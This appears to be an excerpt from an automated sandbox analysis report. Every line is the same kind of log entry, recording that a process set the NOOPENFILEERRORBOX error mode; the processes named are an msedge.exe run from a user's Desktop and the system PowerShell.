                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
